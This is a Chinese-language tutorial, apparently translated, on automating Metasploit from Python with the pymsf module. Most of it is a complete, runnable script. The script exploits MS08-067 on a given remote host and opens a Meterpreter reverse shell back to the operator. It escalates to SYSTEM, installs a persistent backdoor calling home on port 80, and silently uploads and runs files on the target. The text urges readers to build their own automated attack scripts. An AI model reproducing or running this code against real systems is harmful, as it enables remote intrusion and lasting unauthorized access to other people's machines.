##Python版的Metasploit
pymsf模塊是Spiderlabs實現的一個python與Metasploit的msgrpc通信的python模塊,但首先你需要先啟動msgrpc服務,命令如下:
```
load msgrpc Pass=<password>
```
與msgrpc進行通信其實就是與msfconsole進行通信,首先你需要創建一個msfrpc的類,登錄到msgrpc服務器并且創建一個虛擬的終端,然后你就可以在你創建的虛擬終端上面執行多個命令的字符串.你可以調用模塊的方法與console.write執行命令,并且通過"console.read"從虛擬終端上面讀取輸入的值.這篇文章將演示如何使用pymsf模塊并且如何開發出一個完整的腳本.
這里有一個函數它創建了一個msfrpc實例,登錄到msgrpc服務器,并且創建了一個虛擬終端.
```
def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress = client.call('console.create')
console_id = ress['id']
```
下一步就是實現把多個字符串發給虛擬終端,通過console.write和console.read在虛擬終端顯示與讀取:
```
## Exploit MS08-067 ##
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('\n')
```
上面的這一小段代碼創建了一個MSF的資源文件,這樣你就可以通過"resoucen <PathToFile>"命令去執行指定文件里面中一系列的命令.下面我們將通過"getsystem"命令把這個文件的提權,建立一個后門打開80端口來轉發.并且永久的運行.最后上傳我們的漏洞exp并且在命令模式下面悄悄的安裝:
```
# 這個函數會創建一個MSF .rc文件
def builder(RHOST, LHOST, LPORT):
post = open('/tmp/smbpost.rc', 'w')
bat = open('/tmp/ms08067_install.bat', 'w')
postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""
batcomm = "ms08067_patch.exe /quiet"
post.write(postcomms); bat.write(batcomm)
post.close(); bat.close()
```
通過上面的那段代碼,將會創建一個.rc的文件.通過msf模塊“post/multi/gather/run_console_rc_file”在當前的meterpreter會話中運行生成的文件,并且通過console.write命令從虛擬終端寫入數據,通過console.read命令來回顯返回內容:
```
## 運行生成的exp ##
runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
print "[+] Running post-exploit script on: "+RHOST
client.call('console.write',[console_id,runPost])
rres = client.call('console.read',[console_id])
## Setup Listener for presistent connection back over port 80 ##
sleep(10)
listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
print "[+] Setting up listener on: "+LHOST+":80"
client.call('console.write',[console_id,listen])
lres = client.call('console.read',[console_id])
print lres
```
上面代碼中的變量(RHOST, LHOST, LPORT等)都是通過optparse模塊從命令終端輸入的,完整的腳本托管在github上面,有時候你需要知道腳本的生成的地方都是靜態地址,不會在其他的目錄生成,例如ms08067的補丁就會在你的/tmp/目錄下面。大家只要知道基礎然后對下面的代碼進行一定的修改就可以編程一個屬于你自己的msf自動化攻擊腳本,我們建議通過博客里面發表的一些簡單的例子出發,然后自己寫一個msf攻擊腳本:
```
import os, msfrpc, optparse, sys, subprocess
from time import sleep
# Function to create the MSF .rc files
def builder(RHOST, LHOST, LPORT):
post = open('/tmp/smbpost.rc', 'w')
bat = open('/tmp/ms08067_install.bat', 'w')
postcomms = """getsystem
run persistence -S -U -X -i 10 -p 80 -r """+LHOST+"""
cd c:\\
upload /tmp/ms08067_patch.exe c:\\
upload /tmp/ms08067_install.bat c:\\
execute -f ms08067_install.bat
"""
batcomm = "ms08067_patch.exe /quiet"
post.write(postcomms); bat.write(batcomm)
post.close(); bat.close()
# Exploits the chain of rc files to exploit MS08-067, setup persistence, and patch
def sploiter(RHOST, LHOST, LPORT, session):
client = msfrpc.Msfrpc({})
client.login('msf', '123')
ress = client.call('console.create')
console_id = ress['id']
## Exploit MS08-067 ##
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('\n')
## Run Post-exploit script ##
runPost = """use post/multi/gather/run_console_rc_file
set RESOURCE /tmp/smbpost.rc
set SESSION """+session+"""
exploit
"""
print "[+] Running post-exploit script on: "+RHOST
client.call('console.write',[console_id,runPost])
rres = client.call('console.read',[console_id])
## Setup Listener for presistent connection back over port 80 ##
sleep(10)
listen = """use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 80
set LHOST """+LHOST+"""
exploit
"""
print "[+] Setting up listener on: "+LHOST+":80"
client.call('console.write',[console_id,listen])
lres = client.call('console.read',[console_id])
print lres
def main():
parser = optparse.OptionParser(sys.argv[0] +\
' -p LPORT -r RHOST -l LHOST')
parser.add_option('-p', dest='LPORT', type='string', \
help ='specify a port to listen on')
parser.add_option('-r', dest='RHOST', type='string', \
help='Specify a remote host')
parser.add_option('-l', dest='LHOST', type='string', \
help='Specify a local host')
parser.add_option('-s', dest='session', type='string', \
help ='specify session ID')
(options, args) = parser.parse_args()
session=options.session
RHOST=options.RHOST; LHOST=options.LHOST; LPORT=options.LPORT
if (RHOST == None) and (LPORT == None) and (LHOST == None):
print parser.usage
sys.exit(0)
builder(RHOST, LHOST, LPORT)
sploiter(RHOST, LHOST, LPORT, session)
if __name__ == "__main__":
main()
```
